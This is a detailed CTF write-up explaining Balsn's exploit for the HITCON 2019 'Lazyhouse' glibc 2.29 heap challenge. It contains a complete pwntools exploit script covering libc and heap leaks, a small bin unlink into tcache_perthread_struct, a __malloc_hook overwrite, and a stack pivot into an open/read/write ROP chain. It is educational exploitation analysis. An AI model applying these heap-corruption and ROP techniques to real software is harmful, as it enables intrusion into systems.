Balsn's Lazyhouse Exploit Analysis: ROP on the heap in GLIBC 2.29

Disclaimer: I did not solve this challenge during the CTF.

Lazyhouse was a glibc-2.29 heap exploitation challenge from HITCON CTF Qualifiers 2019, created by Angelboy. It was a heap challenge running in a seccomp sandbox that prevented the execve syscall, amongst other things.

Shortly after the CTF ended, Balsn released their exploit script. Their exploit used a couple of new techniques that I have never encountered before, and the script itself has no comments either. Because of this, I’ve decided to create this comprehensive writeup detailing the techniques they have used to successfully perform an open->read->write ROP chain after pivoting the stack to the heap.

I will preface the post by saying that the techniques used are quite advanced. If you are still confused after reading my explanations, I suggest you take my exploit script and attach GDB to each point in the program, and then view the memory / heap / etc to clear any confusions.

You may also pm me on twitter (@farazsth98) with any questions you have and I will do my best to answer them.

Reverse Engineering

If you have reverse engineered this binary already, feel free to skip this section.

When we run the binary, we run into the following menu:

vagrant@ubuntu1904:/ctf/CTF-archive/hitcon-2019/lazyhouse$ ./lazyhouse 
$$$$$$$$$$$$$$$$$$$$$$$$$$$$
🍊       Lazy House       🍊
$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$   1. Buy House           $
$   2. Show Lay's house    $
$   3. Sell                $
$   4. Upgrade             $
$   5. Buy a super house   $
$   6. Exit                $
$$$$$$$$$$$$$$$$$$$$$$$$$$$
Your choice: 

The binary was quite simple to reverse engineer. The program initially has a global variable called money which is initialized to 0x1c796. It also has a global array of house objects, with a max size of 8. The house struct looks like this:

typedef struct house
{
  char *desc;
  uint64_t size;
  uint64_t price;
} house;

house houses[8];

The program also has a global pointer for a super_house object, defined as follows:

typedef struct super_house
{
  char *desc;
  uint64_t size;
  uint64_t price;
} super_house;

super_house superhouse;

The binary lets you do a couple different things.

It let’s you buy a house, which has an integer overflow vulnerability, as shown below:

void buy_house()
{
  uint64_t index;
  uint64_t size;
  char *house_desc;
  char msg[256];

  memset(msg, 0, 0x100);
  snprintf(msg, 0x100, "Your money:%lu", money);
  write_var(msg);
  write_prompt("Index:");
  index = read_int();

  // Check if the index isn't in range or if the index is taken
  if (index > 7 || houses[index].desc != NULL)
  {
    write_var("Invalid !");
  }
  else
  {
    write_prompt("Size:");
    size = read_int();

    // We cannot have fastbin sizes
    if (size > 0x7F )
    {
      // We must have enough money to buy the house
      if (218 * size <= money ) // Integer overflow here
      {
        memset(msg, 0, 0x100);
        snprintf(msg, 0x100, "Price:%lu", money);
        write_var(msg);
        houses[index].price = size << 6; // Price set to a fraction of cost
        houses[index].size = size;
        money -= 218 * size;
        house_desc = calloc(1, size);
        if (house_desc)
        {
          write_prompt("House:");
          read_str(house_desc, size);
          houses[index] = house_desc;
        }
        else
        {
          write_var("Buy error");
        }
      }
      else
      {
        write_var("You don't have enough money!");
      }
    }
    else
    {
      write_var("Lays don't like a small house");
    }
  }
}

We can have up to 8 houses at any one time.

We can trigger the integer overflow vulnerability by passing in a size large enough such that 218 * size wraps around back down to 0, passing the check. We will use this vulnerability in the exploitation stage later.

Next, we can show a house:

void show_house()
{
  uint64_t index;

  write_prompt("Index:");
  index = read_int();

  // Ensure there is a house at this index
  if (index <= 7 && houses[index])
    write(1, houses[index], houses[index].size);
  else
    write_var("Invalid !");
}

The interesting thing here is that it uses write to output the description. This means that it will not stop at NULL bytes, which is very useful to us as well.

Next, we can sell houses, which simply gives a fraction of the money we used to buy the house back to us, then zeroes out the description, size, and price of the house. No UAF here.

void sell_house()
{
  uint64_t index;

  write_prompt("Index:");
  index = read_int();

  // Check that index is within range
  if (index > 7)
    write_var("Invalid !");
  else
  {
    free(houses[index].desc);
    money += houses[index].price;
    houses[index] = 0;
    houses[index].size = 0;
    houses[index].price = 0;
  }
}

Next, we can upgrade our house. There is a global variable called upgrades which is initially set to 2. Each time we upgrade our house, it will decrement it. Once it is 0, we are out of upgrades. This just means we can upgrade houses a maximum of two times.

This is where the only other vulnerability in the program lies: There is a heap overflow vulnerability, as shown below:

void upgrade_house()
{
  uint64_t index;
  uint64_t size;

  // Check that we aren't out of upgrades
  if (upgrades <= 0)
    write_var("You cannot upgrade again !");
  else
  {
    write_prompt("Index:");
    index = read_int();

    // Make sure index is in range and the house exists
    if (index > 7 || !houses[index])
      write_var("Invalid !");
    else
    {
      size = houses[index].size;
      write_prompt("House:");
      read_str(houses[index], size + 0x20); // Heap overflow here
      houses[index].price = (218 * size);
      --upgrades;
    }
  }
}

It lets us read size+0x20 bytes into the description of the house we are upgrading, but it doesn’t call realloc to change the size of the description first. This gives us a heap overflow of 0x20 bytes. Since we can only do this twice, we have to use it efficiently.

Finally, we are allowed to buy a “super house”, as shown below:

void buy_super_house()
{
  char superhouse_desc[768];

  // We are only allowed one super house
  if (superhouse.desc)
  {
    write_var("Lays already has a super house!");
  }
  else
  {
    // We can only get a superhouse if we have enough money
    if ( money <= 0x216fffff )
    {
      write_var("You don't have enough money to buy the luxury house");
      exit(535);
    }
    money -= 0x21700000;
    memset(superhouse_desc, 0, 0x300);
    write_prompt("House:");
    read_str(superhouse_desc, 0x217);
    superhouse.desc = malloc(0x217);
    memset(superhouse.desc, 0, 0x217);
    strncpy(superhouse.desc, superhouse_desc, 0x217);
    superhouse.price = 0x21700000;
    superhouse.size = 0x217;
    write_var("Done!");
  }
}

We will not have a pointer to this superhouse in any way, so we won’t be able to view it, sell it, or do anything with it after buying it.

The important thing to note here is that buy_house used calloc to allocate houses, but buy_super_house actually uses malloc. The reason this is important will be explained in the exploitation stage.

Finally, the binary runs in a seccomp sandbox. We can use david942j’s seccomp-tools to dump the seccomp rules:

vagrant@ubuntu1904:/ctf/CTF-archive/hitcon-2019/lazyhouse$ seccomp-tools dump ./lazyhouse
 line  CODE  JT   JF      K
=================================
0x20 0x00 0x00 0x00000004  A = arch
0x15 0x01 0x00 0xc000003e  if (A == ARCH_X86_64) goto 0003
0x06 0x00 0x00 0x00000000  return KILL
0x20 0x00 0x00 0x00000000  A = sys_number
0x15 0x00 0x01 0x0000000f  if (A != rt_sigreturn) goto 0006
0x06 0x00 0x00 0x7fff0000  return ALLOW
0x15 0x00 0x01 0x000000e7  if (A != exit_group) goto 0008
0x06 0x00 0x00 0x7fff0000  return ALLOW
0x15 0x00 0x01 0x0000003c  if (A != exit) goto 0010
0x06 0x00 0x00 0x7fff0000  return ALLOW
0x15 0x00 0x01 0x00000002  if (A != open) goto 0012
0x06 0x00 0x00 0x7fff0000  return ALLOW
0x15 0x00 0x01 0x00000000  if (A != read) goto 0014
0x06 0x00 0x00 0x7fff0000  return ALLOW
0x15 0x00 0x01 0x00000001  if (A != write) goto 0016
0x06 0x00 0x00 0x7fff0000  return ALLOW
0x15 0x00 0x01 0x0000000c  if (A != brk) goto 0018
0x06 0x00 0x00 0x7fff0000  return ALLOW
0x15 0x00 0x01 0x00000009  if (A != mmap) goto 0020
0x06 0x00 0x00 0x7fff0000  return ALLOW
0x15 0x00 0x01 0x0000000a  if (A != mprotect) goto 0022
0x06 0x00 0x00 0x7fff0000  return ALLOW
0x15 0x00 0x01 0x00000003  if (A != close) goto 0024
0x06 0x00 0x00 0x7fff0000  return ALLOW
0x06 0x00 0x00 0x00000000  return KILL

So we are only allowed to do the following 64 bit syscalls: rt_sigreturn, exit_group, exit, open, read, write, brk, mmap, mprotect, and close. No execve means we can’t get a shell.

Exploitation

Let’s start out, as always, by writing up some methods in our exploit script to ease exploitation:

#!/usr/bin/env python2

from pwn import *

BINARY = './lazyhouse'
HOST, PORT = '3.115.121.123', 5731

elf = ELF('./lazyhouse')
libc = ELF('./libc.so.6')

def start():
  if not args.REMOTE:
    print "LOCAL PROCESS"
    return process(BINARY)
  else:
    print "REMOTE PROCESS"
    return remote(HOST, PORT)

def get_base_address(proc):
  return int(open("/proc/{}/maps".format(proc.pid), 'rb').readlines()[0].split('-')[0], 16)

def debug(breakpoints):
    script = "handle SIGALRM ignore\n"
    PIE = get_base_address(p)
    script += "set $_base = 0x{:x}\n".format(PIE)
    for bp in breakpoints:
        script += "b *0x%x\n"%(PIE+bp)
    gdb.attach(p,gdbscript=script)

def buy(idx, size, content):
  p.sendlineafter(': ', '1')
  p.sendlineafter(':', str(idx))
  p.sendlineafter(':', str(size))
  p.sendafter(':', content)

def show(idx):
  p.sendlineafter(': ', '2')
  p.sendlineafter(':', str(idx))

def sell(idx):
  p.sendlineafter(': ', '3')
  p.sendlineafter(':', str(idx))

def upgrade(idx, content):
  p.sendlineafter(': ', '4')
  p.sendlineafter(':', str(idx))
  p.sendafter(':', content)

def super_house(content):
  p.sendlineafter(': ', '5')
  p.sendafter(':', content)

context.arch = 'amd64'
context.terminal = ['tmux', 'new-window']

p = start()

if args.GDB:
  debug([])

Initially, we start out with enough money to only purchase a house of maximum size 0x217 (or any subset of that size). This won’t do us much good, therefore we have to find a way to get infinite money.

Get infinite money

Well it isn’t really infinite money, but for the purposes of this program it may as well be. We can use the integer overflow bug in the buy_house function to get a huge amount of money. The bug is shown here:

...
// We cannot have fastbin sizes
if (size > 0x7F )
{
  // We must have enough money to buy the house
  if (218 * size <= money ) // Integer overflow here
  {
    memset(msg, 0, 0x100);
    snprintf(msg, 0x100, "Price:%lu", money);
    write_var(msg);
    houses[index].price = size << 6; // Price set to a fraction of cost
...

If we pass in a size large enough such that 218 * size wraps around to 0, the second if check will pass, which will set the house’s price to a VERY large number. Of course, the calloc afterwards will most definitely fail, but the program will still continue running due to the error checking in this function, and the sell price of the house will have still been set to a very large number.

Recall that when we sell a house, the only sanity check it performs is that the index is within range. If we manage to get a house’s price set to that very large number, we can immediately sell it and be given back the money, hence giving us a huge amount of money.

We utilize the integer overflow bug as follows to get infinite money:

def get_money():
  # Cause the integer overflow
  payload = ((2**64-1) / 218)+1
  p.sendlineafter(': ', '1')
  p.sendlineafter(':', '0')
  p.sendlineafter(':', str(payload))

  # Sell the house for infinite money
  sell(0)

get_money()

Now we can buy as many houses as we’d like!

Getting libc and heap leaks

Balsn used a technique that I had never seen before to get the required leaks.

You can actually force calloc to return memory that is not zeroed out. It utilizes the following code in __libc_calloc:

// Don't zero out memory if the chunk's IS_MMAPPED bit is set
if (chunk_is_mmapped (p))
{
  // Used for debugging purposes, ignored
  if (__builtin_expect (perturb_byte, 0))
    return memset (mem, 0, sz);

  return mem;
}

Knowing this, in order to leak both libc and heap addresses, we need to do the following:

Free a large chunk into the unsorted bin. Call it chunk B.
Allocate another chunk in order to move chunk B from the unsorted bin into a large bin. This will populate the chunk’s fd_nextsize and bk_nextsize fields with heap addresses. It’s fd and bk fields will contain libc addresses.
Use the first upgrade to overflow into chunk B’s size, and flip the IS_MMAPPED bit to set it to 1.
Buy a house that is the exact size of chunk B, and calloc will give you back chunk B without zeroing it out.

Since the show_house function uses write to write out house[index].size bytes of the house’s description, it will not stop at NULL bytes, which lets us leak both a libc address (from either the fd or bk fields) and a heap address (from either the fd_nextsize or bk_nextsize fields).

The steps are shown below in my exploit script:

buy(0, 0x80, 'A'*0x80) # Used to overwrite into chunk B
buy(1, 0x500, 'B'*0x500) # Chunk B
buy(2, 0x80, 'C'*0x80) # Prevent consolidation of chunk B with top chunk

# Sell chunk B into unsorted bin
sell(1)
buy(1, 0x600, 'A'*0x600) # Move chunk B to large bin

# Overflow to turn on the IS_MMAPPED bit of chunk B
# This prevents calloc from clearing the chunk when we reallocate it
upgrade(0, '\x00'*0x88 + p64(0x513))

# Get chunk B back without it being zeroed out
buy(7, 0x500, 'A'*8)

# Leak libc and heap addresses
show(7)
data = p.recv(0x18)

libc.address = u64(data[8:16]) - 0x1e50d0 # Leak from bk
heap = u64(data[16:24]) - 0x2e0 # Leak from fd_nextsize

pop_rdi = libc.address + 0x26542
pop_rsi = libc.address + 0x26f9e
pop_rdx = libc.address + 0x12bda6
pop_rax = libc.address + 0x47cf8
syscall = libc.address + 0xcf6c5
malloc_hook = libc.symbols['__malloc_hook']
leave_ret = libc.address + 0x58373

With the leaks, we can move on to the final stage of the exploit.

ROP on the heap!?

This is where the exploit is truly amazing in my opinion. Balsn makes use of a number of techniques to set up the heap before finally overwriting __malloc_hook with a leave; ret gadget, which pivots the stack onto the heap and returns into a ROP chain that was put onto the heap. This stack pivot only happens when __malloc_hook is called through calloc. It is really freaking cool.

The important thing to note here is this: buy_house uses calloc to allocate memory for each house’s description. calloc DOES NOT use the tcache. This means that any chunks we free into the tcache cannot be used. A classic tcache poisoning attack especially cannot be used since we are only allowed one malloc in the entire program (buy_super_house).

Initially, the indexes 0, 1, and 2 are cleared so they can be reused (remember that we have a max limit of 8 houses):

# Clear indexes 0, 1, and 2
sell(0) # goes into tcache 0x80
sell(1) # merges with top chunk
sell(2) # goes into tcache 0x80

Balsn then chooses to do a fake backwards consolidation of the top chunk. This lets them have a fake 0x6c1 sized chunk which they later use to overwrite the fd and bk pointers of a smallbin chunk to perform a small bin unlink attack.

I will explain the unlink attack later, but right now, let’s look at how the top chunk backwards consolidation takes place.

Initially, a 0x80 sized chunk is created with a fake 0x231 chunk header inside it. This 0x230 sized chunk is what we consolidate a 0x600 sized chunk back to. This 0x600 chunk will border the top chunk, which will finally cause the top chunk to consolidate all the way back to the 0x230 sized chunk.

In order to perform the initial backwards consolidation however, there are a number of checks we have to bypass. The checks are shown below:

static void * _int_malloc (mstate av, size_t bytes)
{
  ...
  /* consolidate backward */
  if (!prev_inuse(p)) {
    prevsize = prev_size (p);
    size += prevsize;
    p = chunk_at_offset(p, -((long) prevsize));
    if (__glibc_unlikely (chunksize(p) != prevsize))
      malloc_printerr ("corrupted size vs. prev_size while consolidating");
    unlink_chunk (av, p);
  }
  ...
}

static void unlink_chunk (mstate av, mchunkptr p)
{
  if (chunksize (p) != prev_size (next_chunk (p)))
    malloc_printerr ("corrupted size vs. prev_size");

  mchunkptr fd = p->fd;
  mchunkptr bk = p->bk;

  if (__builtin_expect (fd->bk != p || bk->fd != p, 0))
    malloc_printerr ("corrupted double-linked list");

  fd->bk = bk;
  bk->fd = fd;
  if (!in_smallbin_range (chunksize_nomask (p)) && p->fd_nextsize != NULL)
  {
    ...
  }
}

A new check has been added in glibc 2.29. It is shown in _int_malloc. The prev_size of the chunk we are freeing must match the size of the chunk that we are consolidating back onto. This means that since our fake chunk’s size is 0x230, we must put the consolidating chunk 0x230 bytes after our fake chunk, otherwise the consolidation will fail at this check.

Next, we have to bypass the fd->bk != p || bk->fd != p check. We can inspect the fake 0x230 sized chunk in GDB and know for a fact that this fake chunk will be at heapbase+0x890. Knowing this, we can forge the fd and bk fields as follows to be able to bypass this check:

# Create a fake 0x230 sized chunk within a new chunk
# The target address is used to pass the unlink_chunk checks in libc 2.29
target = heap + 0x890
buy(6, 0x80, '\x00'*8 + p64(0x231)+p64(target+8)+p64(target+0x10)+p64(target))

pwndbg> x/10gx 0x55b0b1fb9880
0x55b0b1fb9880: 0x0000000000000000      0x0000000000000091 <- p
0x55b0b1fb9890: 0x0000000000000000      0x0000000000000231 <- fake chunk
0x55b0b1fb98a0: 0x000055b0b1fb9898      0x000055b0b1fb98a0 <- fd->bk == p, bk->fd == p
0x55b0b1fb98b0: 0x000055b0b1fb9890      0x0000000000000000
0x55b0b1fb98c0: 0x0000000000000000      0x0000000000000000

We don’t have to bypass the checks in the if (!in_smallbin_range ...) block since in_smallbin_range will compare the chunk’s size to 0x3ff, and our chunk’s size is only 0x230, putting it inside the small bin range.

Next, Balsn creates three 0x80 chunks followed by a 0x600 sized chunk. The three 0x80 chunks make it so that the gap between the fake 0x230 sized chunk and the 0x600 sized chunk is exactly 0x230 bytes, which is required for the backwards consolidation check to pass. Following that, the second and last upgrade is used to overwrite the 0x600 chunk’s size header to 0x610 (to switch off the PREV_INUSE bit), as well as change its prev_size to 0x230:

# Create enough chunks to create a 0x230 sized gap between the fake 0x230 chunk above
# and the 0x600 sized chunk below that we will consolidate backwards
buy(5, 0x80, 'C'*0x80)
buy(0, 0x80, 'D'*0x80)
buy(1, 0x80, 'E'*0x80)

# This chunk will be freed to consolidate backwards
buy(2, 0x600, '\x00'*0x600)

# Set prev size to go back to the fake 0x230 chunk
# Clear prev inuse bit of the 0x600 sized chunk
upgrade(1, '\x00'*0x80 + p64(0x230) + p64(0x610))

pwndbg> x/100gx 0x561433a1c880
0x561433a1c880: 0x0000000000000000      0x0000000000000091
0x561433a1c890: 0x0000000000000000      0x0000000000000231
0x561433a1c8a0: 0x0000561433a1c898      0x0000561433a1c8a0
0x561433a1c8b0: 0x0000561433a1c890      0x0000000000000000
...
0x561433a1cab0: 0x0000000000000000      0x0000000000000000
0x561433a1cac0: 0x0000000000000230      0x0000000000000610 <- 0x600 sized chunk
0x561433a1cad0: 0x0000000000000000      0x0000000000000000

Freeing the 0x600 chunk now will first consolidate the 0x600 chunk back onto the 0x230 chunk and insert it into the unsorted bin. Then, since the top chunk borders this free chunk, the top chunk will also be consolidated backwards onto it:

# 0x600 chunk will now be freed and consolidated back to the fake 0x230 sized chunk
# Top chunk is right after this, so top chunk is consolidated all the way back too
sell(2)

pwndbg> x/10gx 0x5595bf50f880
0x5595bf50f880: 0x0000000000000000      0x0000000000000091
0x5595bf50f890: 0x0000000000000000      0x0000000000020771 <- new top chunk
0x5595bf50f8a0: 0x00005595bf50f898      0x00005595bf50f8a0
0x5595bf50f8b0: 0x00005595bf50f898      0x0000000000000000
0x5595bf50f8c0: 0x0000000000000000      0x0000000000000000

Now, I said initially that Balsn does a small bin unlink attack. They use this attack to get a chunk inside the tcache_perthread_struct. In order the pass the checks when unlinking, the 0x20 and 0x30 tcache bins must have pointers in them that point to chunks whose fd and bk must be under our control.

If you look above, before we freed the 0x600 chunk and consolidated it backwards, we created three 0x80 sized chunks in indexes 5, 0, and 1. Balsn now creates a 0x500 sized chunk and does the following:

Insert a 0x6c1 sized fake chunk. Index 5 from above will point to this chunk.
Insert a 0x31 sized fake chunk. Index 0 from above will point to this chunk.
Insert a 0x21 sized fake chunk. Index 1 from above will point to this chunk.
Free the 0x20 and 0x30 sized chunks to populate their corresponding tcache bins in the tcache_perthread_struct.
Finally, free the 0x500 sized chunk to consolidate the top chunk back again. Now, with any new allocations we make, we are able to control the metadata of those chunks. The important bit is that we’ve inserted them as pointers into the tcache_perthread_struct.

This step is extremely important for the next part of the exploit. I will refer back to here when needed.

# Index 5 will be the 0x6c1 sized fake chunk in the payload
# Index 0 will be the 0x31 sized chunk
# Index 1 will be the 0x21 sized chunk
payload = '\x00'*0x78 + p64(0x6c1) # Index 5
payload += p64(0)*17 + p64(0x31) # Index 0
payload += p64(0)*17 + p64(0x21) # Index 1
payload += p64(0)*15
buy(2, 0x500, payload)

# We put pointers to these chunks into the tcache_perthread_struct now
# This is required later when we do the small bin unlink attack
sell(0) # Free 0x30 sized chunk
sell(1) # Free 0x20 sized chunk

# Consolidate backwards again
# Any new allocations following this will allow us to overwrite the metadata of any
# of the chunks from above
sell(2)

The tcache_perthread_struct can be seen with the pointers to the 0x20 and 0x30 sized chunks as follows:

pwndbg> x/20gx 0x562a666cd000
0x562a666cd000: 0x0000000000000000      0x0000000000000251
0x562a666cd010: 0x0200000000000101      0x0000000000000000
0x562a666cd020: 0x0000000000000000      0x0000000000000000
0x562a666cd030: 0x0000000000000000      0x0000000000000000
0x562a666cd040: 0x0000000000000000      0x0000000000000000
0x562a666cd050: 0x0000562a666cda40      0x0000562a666cd9b0 <- our 0x20 and 0x30 chunks
0x562a666cd060: 0x0000000000000000      0x0000000000000000    in tcache_perthread_struct

Next, what Balsn does is fill up the 0x210 tcache bin in order to be able to send a 0x210 sized chunk into a small bin (to be used for the small bin unlink attack).

While they do this, they also insert a fake chunk of size 0xd1. This fake chunk is exactly 0x6c1 bytes after that 0x6c1 fake chunk we inserted into index 5. This bypasses the check in _int_free when we free the 0x6c1 sized chunk, which makes sure that the next chunk’s PREV_INUSE bit is set.

Also while they do that, they prepare the 0x210 chunk that is going to be used in the small bin unlink attack such that it lies right on top of the pointer to that 0x21 sized fake chunk we freed earlier.

# We create a chunk to go right up to the 0x20 sized chunk's fd and bk
# We must also maintain the 0x6c1 sized fake chunk here as we still have a pointer to it
# We will free the fake 0x6c1 chunk into the unsorted bin later
# It will be used to overwrite the metadata of the fake chunks from above
buy(0, 0x1a0, p64(0)*15+p64(0x6c1))

# This chunk will be right on top of where the fake 0x20 sized chunk was before
# It will be sent into the small bin
# We will use it to perform a small bin unlink attack later
buy(1, 0x210, 'A'*0x210)

# Just a filler chunk for the next chunk
buy(2, 0x210, 'B'*0x210)
sell(2) # Send to tcache

# We need the fake 0xd1 chunk header here to be able to free the 0x6c1 chunk
# This offset can be found using gdb
buy(2, 0x210, '\x00'*0x148+p64(0xd1))
sell(2) # Send to tcache

# Fill the 0x210 tcache bin the rest of the way
for i in range(5):
  buy(2, 0x210, 'a')
  sell(2)

Following this, they allocate and free a 0x3a0 sized chunk. This increments the count field of the 0x3a0 tcache bin by one. This is done in order to make it look like there is a 0x100 sized chunk at heapbase+0x40 which is important since they will later use the small bin unlink attack to get a chunk right on top of this address. One of the checks will make sure this chunk has a “legal size”, thus this must look like a fake chunk:

# We create a fake 0x100 chunk header in the tcache_perthread_struct
# by freeing this chunk
buy(2, 0x3a0, 'A'*0x3a0)
sell(2) # Send to tcache

pwndbg> x/20gx 0x55f2db383000
0x55f2db383000: 0x0000000000000000      0x0000000000000251
0x55f2db383010: 0x0200000000000101      0x0000000000000000
0x55f2db383020: 0x0000000000000000      0x0000000000000000
0x55f2db383030: 0x0000000000000007      0x0000000000000000
0x55f2db383040: 0x0000000000000000      0x0000000000000100 <- heapbase+0x40
0x55f2db383050: 0x000055f2db383a40      0x000055f2db3839b0
0x55f2db383060: 0x0000000000000000      0x0000000000000000

Now we start with the small bin unlink attack. First, remember the 0x210 sized chunk we allocated that I said was right on top of that fake 0x20 sized chunk from way before? We now send it to the small bin:

# Send that initial 0x210 sized chunk into the small bin now
sell(1) # Send it to the unsorted bin
buy(1, 0x220, 'A'*0x210) # Move it to the small bin 

pwndbg> smallbin
smallbins
0x220: 0x55be054fea40 —▸ 0x7f9879311eb0 (main_arena+624) ◂— 0x55be054fea40

Now we free that fake 0x6c1 chunk from before into the unsorted bin, and reallocate it to be able to overwrite the metadata for the 0x20 and 0x30 sized fake chunks whose pointers are currently in the tcache_perthread_struct.

We make it so that the fd pointer of the 0x20 chunk points to the fake chunk in the tcache_perthread_struct.
We make it so that the fd pointer for the small bin chunk (the 0x30 sized chunk essentially) points to the small bin itself (as it should), while the bk pointer points to the fake chunk in the tcache_perthread_struct.

This is shown below:

smallbin = libc.address + 0x1e4eb0 # 0x220 small bin is here
tcache_fake_chunk = heap+0x40 # Fake chunk in the tcache_perthread_struct

payload = '\x00'*0x98 + p64(0x31) # 0x30 sized chunk pointer points here
payload += p64(tcache_fake_chunk) # Overwrite the fd to heapbase+0x40
payload += '\x00'*0x80 + p64(0x221) # 0x30 sized chunk pointer points here
payload += p64(smallbin) + p64(tcache_fake_chunk) # Overwrite fd and bk, corrupt smallbin
buy(5, 0x6b0, payload)

This sets it up so that the heap and the smallbin now looks like this:

pwndbg> x/40gx 0x562f0aff6000
0x562f0aff6000: 0x0000000000000000      0x0000000000000251
0x562f0aff6010: 0x0200000000000101      0x0000000000000000
0x562f0aff6020: 0x0000000000000000      0x0000000000000000
0x562f0aff6030: 0x0000000000000007      0x0000000000000000
0x562f0aff6040: 0x0000000000000000      0x0000000000000100 <- fake_chunk in the
0x562f0aff6050: 0x0000562f0aff6a40      0x0000562f0aff69b0    tcache_perthread_struct
0x562f0aff6060: 0x0000000000000000      0x0000000000000000

pwndbg> x/4gx 0x0000562f0aff6a40 <- (fake_chunk->fd)
0x562f0aff6a40: 0x0000000000000000      0x0000000000000221 
0x562f0aff6a50: 0x00007f42e405deb0      0x0000562f0aff6040 <- fake_chunk   
                        ^------------------------------------ small bin

pwndbg> x/4gx 0x0000562f0aff69b0 <- (fake_chunk->bk)
0x562f0aff69b0: 0x0000000000000000      0x0000000000000031
0x562f0aff69c0: 0x0000562f0aff6040      0x0000000000000000
                        ^------------------------------------ fake_chunk

pwndbg> x/4gx 0x00007f42e405deb0 <- small bin
0x7f42e405deb0 <main_arena+624>:        0x00007f42e405dea0      0x00007f42e405dea0
0x7f42e405dec0 <main_arena+640>:        0x0000562f0aff6a40      0x0000562f0aff6a40

With this setup, the first chunk we allocate out of this small bin will give us back the 0x210 sized chunk we freed initially into the small bin. The next chunk we allocate will be right on top of heapbase+0x40.

The setup is so extensive just to bypass the following check in __int_malloc:

  if (in_smallbin_range (nb))
  {
    idx = smallbin_index (nb);
    bin = bin_at (av, idx);

    if ((victim = last (bin)) != bin)
    {
      bck = victim->bk;
      if (__glibc_unlikely (bck->fd != victim))
        malloc_printerr ("malloc(): smallbin double linked list corrupted");
      set_inuse_bit_at_offset (victim, nb);
      bin->bk = bck;
      bck->fd = bin;

      if (av != &main_arena)
        set_non_main_arena (victim);
      check_malloced_chunk (av, victim, nb);
      ...
      void *p = chunk2mem (victim);
      alloc_perturb (p, bytes);
      return p;
    }
  }

Essentially, the only check we have to bypass is the if (__glibc_unlikely (bck->fd) != victim) check. You should be able to verify yourself from the memory shown above that the chunks are set up correctly to be able to bypass it.

After that check is bypassed, the small bin’s bk is set to the bk field of the victim chunk. In our case, this gets it set to heapbase+0x40. It also sets the fd pointer of the fake chunk at heapbase+0x40 to point to the small bin. This makes it so that the next allocation will give us a chunk right on top of heapbase+0x40.

Balsn uses the first chunk allocation out of the small bin to set up their ROP chain on the heap. I’ve replaced ‘/home/lazyhouse/flag’ with ‘/home/vagrant/flag’ due to using the exploit on my own machine:

# Put the flag's location string at a known place on the heap
# Using gdb, the flag's location string will be at heapbase+0xa68
payload = 'Z'*0x18
payload += '/home/vagrant/flag'.ljust(0x20, '\x00')

# ROP to open the flag file
# Flag file's file descriptor will be 3
payload += p64(pop_rdi) + p64(heap+0xa68)
payload += p64(pop_rsi) + p64(0)
payload += p64(pop_rax) + p64(2)
payload += p64(syscall)

# ROP to read the flag file's contents right into heapbase
payload += p64(pop_rdi) + p64(3)
payload += p64(pop_rsi) + p64(heap)
payload += p64(pop_rdx) + p64(0x100)
payload += p64(pop_rax) + p64(0)
payload += p64(syscall)

# ROP to write the contents of heapbase right into stdout
payload += p64(pop_rdi) + p64(1)
payload += p64(pop_rsi) + p64(heap)
payload += p64(pop_rdx) + p64(0x100)
payload += p64(pop_rax) + p64(1)
payload += p64(syscall)

# ROP chain will start at heapbase+0xa88
buy(3, 0x210, payload)

Now that the ROP chain is on the heap at a known address, the next allocation will give us a chunk right on top of heapbase+0x40. We will use this chunk to overwrite the 0x210 tcache bin pointer to point to __malloc_hook:

pwndbg> smallbin
smallbins
0x220 [corrupted]
FD: 0x55d424dd7a40 ◂— 'ZZZZZZZZZZZZZZZZZZZZZZZZ/home/vagrant/flag'
BK: 0x55d424dd7040 —▸ 0x55d424dd79b0 ◂— 0x0 // We are given whatever bk points to

# Overwrite the 0x210 sized chunk tcache bin with pointer to __malloc_hook
buy(2, 0x210, p64(0)*0x20 + p64(malloc_hook))

pwndbg> tcachebin
tcachebins
0x20 [  1]: 0x0
0x30 [  1]: 0x0
0x90 [  2]: 0x0
0x220 [  7]: 0x7f8caef98c30 (__malloc_hook) ◂— 0x0
0x3b0 [  1]: 0x5647d9022b50 ◂— 0x0

Now, since the buy_super_house function calls malloc(0x217), if we try to buy a super house, it will actually give us a chunk on __malloc_hook.

We can’t overwrite __malloc_hook with a one gadget, since the execve syscall is not whitelisted by seccomp. The way Balsn bypasses this is just absolutely amazing. They overwrite __malloc_hook with a leave; ret gadget. Why they do it is explained below, but first, in order to overwrite __malloc_hook, just do the following:

# Overwrite __malloc_hook with a leave; ret gadget
super_house(p64(leave_ret)) # __mpn_mul_n+83

Now why does this work?

In order to understand it, we actually have to look at the disassembly for __libc_calloc. When __libc_calloc is called, assuming that __malloc_hook is not NULL, the following control flow is observed:

mov     rdx, rdi
push    r14
mov     eax, 0FFFFFFFFh
push    r13
or      rdx, rsi
push    r12
push    rbp
mov     rbp, rdi // [1]
push    rbx
imul    rbp, rsi // [2]
cmp     rdx, rax
jbe     short loc_99A28

loc_99A28:
mov     rax, &__malloc_hook
mov     rax, [rax]
test    rax, rax
jnz     loc_99CD0

loc_99CD0:
mov     rsi, [rsp+28h]
mov     rdi, rbp
call    rax

Note that in our case, buy_house will call calloc(1, size), meaning rdi will be 1, and rsi will be whatever size we enter.

At [1], we see a mov rbp, rdi instruction, which will set rbp to 1. At [2], we see a imul rbp, rsi instruction, which will multiply rbp(1) by rsi(size that we control) and store the result into rbp. Later on, at the call rax instruction, rbp will still be equal to size * 1.

Now, remember that we overwrote __malloc_hook with the address to a leave; ret gadget. The leave instruction is equivalent to mov rsp, rbp; pop rbp. Remember that our ROP chain is at heapbase+0xa88. If we ensure that the size we pass to calloc is equal to heapbase+0xa80, what is going to happen is that rsp will be set to heapbase+0xa80 when the mov rsp, rbp instruction happens, and then the pop rbp instruction will move rsp to heapbase+0xa88. The following ret instruction will return into whatever address is at rsp, which will be the address stored at heapbase+0xa88.

Since our ROP chain starts at heapbase+0xa88, we will have successfully pivoted the stack to heapbase+0xa88 and returned into our ROP chain. It is absolutely mind blowing, I’ve never seen anyone use this technique before, and it is amazing to see Balsn do this during the CTF.

After overwriting __malloc_hook with a leave; ret gadget, simply attempt to buy a house with a size of heapbase+0xa80 to pivot the stack and return into the ROP chain that has already been stored on the heap:

# rbp is set to rsi before __malloc_hook is called in calloc
# Therefore we pass heap+0xa80 as an argument, as our ROP chain starts at
# heap+0xa88
buy(4, heap+0xa80, 'A')

p.interactive()

I created a fake flag by doing echo -n hitconctf{congrats} > /home/vagrant/flag and ran the exploit:

vagrant@ubuntu1904:/ctf/CTF-archive/hitcon-2019/lazyhouse$ ./exploit.py 
